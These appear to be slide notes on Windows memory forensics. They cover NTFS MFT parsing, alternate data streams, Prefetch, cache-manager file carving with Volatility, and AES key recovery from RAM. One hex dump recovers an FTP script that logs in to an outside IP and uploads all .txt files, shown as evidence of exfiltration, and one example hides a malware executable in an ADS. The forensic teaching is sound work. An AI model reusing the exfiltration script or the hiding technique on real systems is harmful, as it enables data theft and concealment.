New Technology File System (NTFS) artifacts
Master File Table (MTF) records
Alternative Data Streams (ADS)
Windows Cache Manager
OS is constantly opening, reading, writing and deleting files.
All OS actions leave traces in memory
Windows caches content for performance
Everything is a file
MFT is the heart of the system at \$Mft
start of MFT is in the Volume Boot Record (VBR)
VBR is the $Boot entry in the MFT
Array of file records
Each record is 1024 bytes (can be changed in $Boot)
The first record in the MFT is for the MFT itself
The first 16 records in the MFT are reserved for metadata files
Each record has
Resident attributes = contained within MFT entry
Non-resident = outside of the MFT entry
0x0 0 – 3 Signature (“FILE”) if good otherwise (“BAAD”)
0x4 4 – 5 Offset to fixup array
0x6 6 – 7 Number of entries in fixup array
0x8 8 – 15 $LogFile LSN
0x10 16 – 17 Sequence value
0x12 18 – 19 Link Count
0x14 20 – 21 Offset to first attribute
0x16 22 – 23 Flags (in-use and directory)
0x18 24 – 27 Used size of MFT entry
0x1A 28 – 31 Allocated size of MFT entry
0x20 32 – 39 File reference to base record
0x28 40 – 41 Next attribute ID
0x2A 42 – 1023 Attributes and fixup areas
0x0 0 – 3 Attribute type identifier
0x4 4 – 7 Length of attribute
0x8 8 – 8 Non-resident flag
0x9 9 – 9 Length of name
0xA 10 – 11 Offset to name
0xC 12 – 13 Flags
0xE 14 – 15 Attribute identifier
16(0x10) $STANDARD_INFORMATION
48(0x30) $FILE_NAME
128(0x80) $DATA
32(0x20) $ATTRIBUTE_LIST
Contains
Parse them
Investigation of removable media
Recover ADS
Recover scripts
Reconstruct events
Prove code executed with the Prefetch
Scans for FILE and BAAD signatures
When found... parse the attributes, find file path, output.
Supports
File size < 700 bytes = resident in $DATA
File Size > 700 bytes = dumpfiles
Outputs in verbose and in body mode
Body mode allows sleuthkits mactime plugin to be used.
mactime creates an ASCII timeline of file activity
-D dumps all resident files (size < 700 bytes in $DATA)
MFT entry found at offset 0x10097800
Attribute: In Use & File
Record Number: 9614
Link count: 2
$STANDARD_INFORMATION
Creation Modified MFT Altered Access Date Type
------------------------------ ------------------------------ ------------------------------ ------------------------------ ----
2009-07-13 22:28:34 UTC+0000 2009-07-13 22:28:34 UTC+0000 2011-03-04 17:15:16 UTC+0000 2009-07-13 22:28:34 UTC+0000 Archive
$FILE_NAME
Creation Modified MFT Altered Access Date Name/Path
------------------------------ ------------------------------ ------------------------------ ------------------------------ ---------
2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 PROGRA~1\COMMON~1\MICROS~1\Stationery\Bears.htm
$FILE_NAME
Creation Modified MFT Altered Access Date Name/Path
------------------------------ ------------------------------ ------------------------------ ------------------------------ ---------
2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 2011-03-04 17:15:16 UTC+0000 Bears.htm
$DATA
0000000000: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 53 54 59 <HTML><HEAD><STY
0000000010: 4c 45 3e 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 LE>BODY.{font-fa
0000000020: 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 3b 66 6f 6e mily:.Tahoma;fon
0000000030: 74 2d 73 69 7a 65 3a 20 31 31 70 74 3b 63 6f 6c t-size:.11pt;col
0000000040: 6f 72 3a 20 34 62 33 30 30 38 3b 6d 61 72 67 69 or:.4b3008;margi
0000000050: 6e 2d 6c 65 66 74 3a 20 32 35 20 70 78 3b 6d 61 n-left:.25.px;ma
0000000060: 72 67 69 6e 2d 74 6f 70 3a 20 37 35 20 70 78 3b rgin-top:.75.px;
0000000070: 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 background-posit
0000000080: 69 6f 6e 3a 20 74 6f 70 20 6c 65 66 74 3b 62 61 ion:.top.left;ba
0000000090: 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a ckground-repeat:
00000000a0: 20 72 65 70 65 61 74 2d 78 3b 7d 3c 2f 53 54 59 .repeat-x;}</STY
00000000b0: 4c 45 3e 3c 2f 48 45 41 44 3e 20 3c 42 4f 44 59 LE></HEAD>.<BODY
00000000c0: 20 62 61 63 6b 67 72 6f 75 6e 64 3d 22 42 65 61 .background="Bea
00000000d0: 72 73 2e 6a 70 67 22 3e 3c 42 4f 44 59 20 62 67 rs.jpg"><BODY.bg
00000000e0: 63 6f 6c 6f 72 3d 22 66 66 66 66 66 66 22 3e 3c color="ffffff"><
00000000f0: 2f 42 4f 44 59 3e 20 3c 2f 48 54 4d 4c 3e 20 /BODY>.</HTML>.
Normal data streams, also unnamed data streams, appear after $DATA.
Alternative Data Streams
Not easily visible by a user... cute way to hide data.
MFTParser will extract ADS if they exist
Directories can have ADS entries to hide files
In the below.. 613509021.exe would be hidden from the user in "Windows\1654157019"
Streams from SysInternals will show ADS on live system
python vol.py –f Win7SP1x64.dmp --profile=Win7SP1x64 mftparser
Volatility Foundation Volatility Framework 2.4
[snip]
MFT entry found at offset 0x1c02400
Attribute: In Use & File
Record Number: 19053
[snip]
$FILE_NAME
Creation: 2014-02-18 18:27:29 UTC+0000
Modified: 2014-02-18 18:27:29 UTC+0000
MFT Altered: 2014-02-18 18:27:29 UTC+0000
Access: 2014-02-18 18:27:29 UTC+0000
Name/Path: Windows\1654157019
$DATA
$DATA ADS Name: 613509021.exe
$DATA ADS Name: 613509021.exe in Windows\1654157019
python vol.py –f Win7SP1x64.dmp --profile=Win7SP1x64 pslist
Volatility Foundation Volatility Framework 2.4
Name PID PPID Thds Hnds Sess Start
------------ ------ ------ ------ -------- ------ ------
[snip]
1654157019 3596 696 1 5 0 2014-02-18 18:27:29 UTC+0000
[snip]
python vol.py –f Win7SP1x64.dmp --profile=Win7SP1x64 dlllist -p 3596
Volatility Foundation Volatility Framework 2.4
************************************************************************
1654157019 pid: 3596
Command line : 1654157019:613509021.exe
Base Size LoadCount Path
---------- ---------- ---------- ----
0x00400000 0x330 0xffff C:\WINDOWS\1654157019:613509021.exe
So the file 1654157019 really appeared as 1654157019:613509021.exe using ADS name
RecentDocs registry key
--output-file=mft.body
--output=body
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 mftparser --output-file=mft.body --output=body
Volatility Foundation Volatility Framework 2.4
Scanning for MFT entries and building directory, this can take a while
[root&windows]#cat mft.body | head -n 10
0|[MFT FILE_NAME] $MFT (Offset: 0xa000)|0|-hs------------|0|0|16384|1299258843|1299258843|1299258843|1299258843
0|[MFT STD_INFO] $MFT (Offset: 0xa000)|0|-hs------------|0|0|16384|1299258843|1299258843|1299258843|1299258843
0|[MFT FILE_NAME] . (Offset: 0xa808)|5|-hs----------D-|0|0|0|1299258843|1299258843|1299258843|1299258843
0|[MFT STD_INFO] . (Offset: 0xa808)|5|-hs------------|0|0|0|1381860262|1381860262|1381860262|1247537274
0|[MFT FILE_NAME] bootmgr (Offset: 0xb408)|42703|---a-----------|0|0|0|1299259135|1299259135|1299259135|1299259135
0|[MFT STD_INFO] bootmgr (Offset: 0xb408)|42703|rhsa-----------|0|0|0|1299259135|1290288546|1299259135|1299259135
0|[MFT FILE_NAME] PROGRA~2\VMware\RAWDSK~1\native\C\Windows (Offset: 0x160000)|292|-----------I-D-|0|0|0|1341559419|1341559419|1341559419|1341559419
0|[MFT STD_INFO] PROGRA~2\VMware\RAWDSK~1\native\C\Windows (Offset: 0x160000)|292|-----------I---|0|0|0|1341559419|1341559419|1341559419|1341559419
0|[MFT FILE_NAME] PROGRA~2\MICROS~1\USERAC~1 (Offset: 0x160400)|293|-----------I-D-|0|0|0|1299258912|1299258912|1299258912|1299258912
0|[MFT STD_INFO] PROGRA~2\MICROS~1\USERAC~1 (Offset: 0x160400)|293|-----------I---|0|0|0|1299249186|1299249186|1299249186|1247539025
Use mactime from Sleuthkit to build a timeline!
Remember MRU in Registry and double-clicking files creates a LNK
MFTParser in verbose mode will show $I information which contains metadata on
$FILE_NAME
Creation: 2013-03-11 04:39:52 UTC+0000
Modified: 2013-03-11 04:39:52 UTC+0000
MFT Altered: 2013-03-11 04:39:52 UTC+0000
Access: 2013-03-11 04:39:52 UTC+0000
Name/Path: $Recycle.Bin\S-1-5-21-1133905431-3037184594-
10822689-1000\$I2NGUYJ.docx
$DATA
0000000000: 01000000000000005842000000000000 ........XB......
0000000010: 00c3b478121ece0143003a005c005500 ...x....C.:.\.U.
0000000020: 73006500720073005c0041006e006400 s.e.r.s.\.A.n.d.
0000000030: 7200650077005c004400650073006b00 r.e.w.\.D.e.s.k.
0000000040: 74006f0070005c004d00650072006700 t.o.p.\.M.e.r.g.
0000000050: 65007200200055007000640061007400 e.r...U.p.d.a.t.
0000000060: 65002e0064006f006300780000000000 e...d.o.c.x.....
$I has a timestamp... how to parse it?
Timestamp is 0x10->0x24 = 00c3b478121ece01
[root&windows]#python vol.py -f Win7SP1x64.vmem --profile=Win7SP1x64 volshell
>>> import volatility.addrspace as addrspace
>>> bufferas = addrspace.BufferAddressSpace(self._config,
data = "\x00\xc3\xb4\x78\x12\x1e\xce\x01")
>>> itime = obj.Object("WinTimeStamp", offset = 0, vm = bufferas)
>>> itime.is_utc = True
>>> str(itime)
'2013-03-11 04:39:52 UTC+0000'
Prefetch
[root&windows]#grep -i ".pf" mft.body | grep -i "exe" | cut -d\| -f2
[MFT FILE_NAME] PROGRA~1\MICROS~1\Windows\v6.0A\bin\pvk2pfx.exe (Offset: 0x71db000)
[MFT STD_INFO] PROGRA~1\MICROS~1\Windows\v6.0A\bin\pvk2pfx.exe (Offset: 0x71db000)
[MFT FILE_NAME] Windows\Prefetch\VSAENV.EXE-526F88E1.pf (Offset: 0x8e40000)
[MFT FILE_NAME] Windows\Prefetch\NDP40-KB2840628-V2-X86.EXE-76109BE9.pf (Offset: 0xf7c5400)
[MFT FILE_NAME] Windows\Prefetch\SETUP.EXE-A99FE93A.pf (Offset: 0xf7c5800)
[MFT FILE_NAME] Windows\Prefetch\NGEN.EXE-DEAF5A03.pf (Offset: 0xf7c5c00)
[MFT FILE_NAME] TsWpfWrp.exe (Offset: 0x11060000)
[MFT FILE_NAME] Windows\Prefetch\VC_IA64RUNTIME.EXE-35FD2B16.pf (Offset: 0x18b3d800)
[MFT FILE_NAME] Windows\Prefetch\UNLODCTR.EXE-2462BF52.pf (Offset: 0x18b79c00)
[MFT FILE_NAME] Windows\Prefetch\TASKHOST.EXE-437C05A8.pf (Offset: 0x18c73000)
Look for suspicious names... like MalwareAnalysis.docx.exe
Look for executables that are not common
Using Prefetch with mactime builds a timeline of execution!
Scripts are commonly < 700 bytes so the whole thing would be MFT-resident.
MFTParser in verbose mode show $DATA
$DATA
0x00000000: 6f 70 65 6e 20 36 36 2e 33 32 2e 31 31 39 2e 33 open.66.32.119.3
0x00000010: 38 0d 0a 6a 61 63 6b 0d 0a 32 61 77 65 73 30 6d 8..jack..2awes0m
0x00000020: 65 0d 0a 6c 63 64 20 63 3a 5c 57 49 4e 44 4f 57 e..lcd.c:\WINDOW
0x00000030: 53 5c 53 79 73 74 65 6d 33 32 5c 73 79 73 74 65 S\System32\syste
0x00000040: 6d 73 0d 0a 63 64 20 20 2f 68 6f 6d 65 2f 6a 61 ms..cd../home/ja
0x00000050: 63 6b 0d 0a 62 69 6e 61 72 79 0d 0a 6d 70 75 74 ck..binary..mput
0x00000060: 20 22 2a 2e 74 78 74 22 0d 0a 64 69 73 63 6f 6e ."*.txt"..discon
0x00000070: 6e 65 63 74 0d 0a 62 79 65 0d 0a nect..bye..
MFT timestamps can be manipulated
Programs to timestomp
Subsystem for caching support for file system drivers
Frequently accessed data is in memory to avoid disk reads
Utilizes memory manager for tasks
Maps views of files with memory manager section objects (memory-mapped files)
Caches data within Virtual Address Control Blocks (VACB) with a 256KB view of data
_FILE_OBJECT from executive
Pool tag scan, walk process-handle tables, VAD nodes . . .
>>> dt("_FILE_OBJECT")
'_FILE_OBJECT' (128 bytes)
0x0 : Type ['short']
0x2 : Size ['short']
0x4 : DeviceObject ['pointer', ['_DEVICE_OBJECT']]
0x8 : Vpb ['pointer', ['_VPB']]
0xc : FsContext ['pointer', ['void']]
0x10 : FsContext2 ['pointer', ['void']]
0x14 : SectionObjectPointer ['pointer', ['_SECTION_OBJECT_POINTERS']]
0x18 : PrivateCacheMap ['pointer', ['void']]
0x1c : FinalStatus ['long']
0x20 : RelatedFileObject ['pointer', ['_FILE_OBJECT']]
0x24 : LockOperation ['unsigned char']
0x25 : DeletePending ['unsigned char']
0x26 : ReadAccess ['unsigned char']
0x27 : WriteAccess ['unsigned char']
0x28 : DeleteAccess ['unsigned char']
0x29 : SharedRead ['unsigned char']
0x2a : SharedWrite ['unsigned char']
0x2b : SharedDelete ['unsigned char']
0x2c : Flags ['unsigned long']
0x30 : FileName ['_UNICODE_STRING']
0x38 : CurrentByteOffset ['_LARGE_INTEGER']
0x40 : Waiters ['unsigned long']
0x44 : Busy ['unsigned long']
0x48 : LastLock ['pointer', ['void']]
0x4c : Lock ['_KEVENT']
0x5c : Event ['_KEVENT']
0x6c : CompletionContext ['pointer', ['_IO_COMPLETION_CONTEXT']]
0x70 : IrpListLock ['unsigned long']
0x74 : IrpList ['_LIST_ENTRY']
0x7c : FileObjectExtension ['pointer', ['void']]
Memory manager and cache manager use this to store file mapping and ache information for a file stream
>>> dt("_SECTION_OBJECT_POINTERS")
'_SECTION_OBJECT_POINTERS' (12 bytes)
0x0 : DataSectionObject ['pointer', ['void']]
0x4 : SharedCacheMap ['pointer', ['void']]
0x8 : ImageSectionObject ['pointer', ['void']]
DataSectionObject = Data
ImageSectionObject = Executable
Both point to _CONTROL_AREA which goes to _SUBSECTION used by memory manager
SharedCacheMap in _SECTION_OBJECT_POINTERS points to _SHARED_CACHE_MAP
Scans for _FILE_OBJECTS from process handle tables and VAD trees
[root&windows]#mkdir dumpedFiles
/bin/mkdir: created directory `dumpedFiles'
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 dumpfiles -D dumpedFiles/
Volatility Foundation Volatility Framework 2.4
DataSectionObject 0x85908148 4 \Device\HarddiskVolume1\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl
SharedCacheMap 0x85908148 4 \Device\HarddiskVolume1\Windows\System32\LogFiles\WMI\RtBackup\EtwRTDiagLog.etl
DataSectionObject 0x851df248 4 \Device\clfsKtmLog
[snip]
Scans for file objects using pool tag scanning
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 filescan | grep -i mft
0x000000003ef23558 3 0 RW-rwd \Device\HarddiskVolume1\$MftMirr
0x000000003ef25d28 13 0 RW-rwd \Device\HarddiskVolume1\$Mft
0x000000003efbaa68 17 0 RW-rwd \Device\HarddiskVolume1\$Mft
[root&windows]#volatility -f Win7.bin --profile=Win7SP0x86 dumpfiles -D dumpedFiles/ -n -Q 0x000000003ef25d28
Volatility Foundation Volatility Framework 2.4
DataSectionObject 0x3ef25d28 None \Device\HarddiskVolume1\$Mft
SharedCacheMap 0x3ef25d28 None \Device\HarddiskVolume1\$Mft
Keys are in RAM while encryption is occuring..
aeskeyfind Locates scheduled 128-bit and 256-bit AES keys in MEMORY-IMAGE.
[root&windows]#/opt/aeskeyfind/aeskeyfind Win7.bin
fece4febd7fd0b7b4bebda3239c28a81
5dcfc8255ed8bb69cdd2ea16c292f638
53228d50da3abbb9dc8fb6cd6aed0242
Keyfind progress: 100%
[root&windows]#/opt/aeskeyfind/aeskeyfind stuxnet.vmem
000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f
Keyfind progress: 100%
Several tools to extract keys from memory
Interrogate
Memory scary!
Master key is in memory
Cached passwords are accessible
Commercial solutions for breaking disk encryption exist (Passware, Elcomsoft) but you can do the same with open source utilities
Table of Contents | t |
---|---|
Exposé | ESC |
Full screen slides | e |
Presenter View | p |
Source Files | s |
Slide Numbers | n |
Toggle screen blanking | b |
Show/hide slide context | c |
Notes | 2 |
Help | h |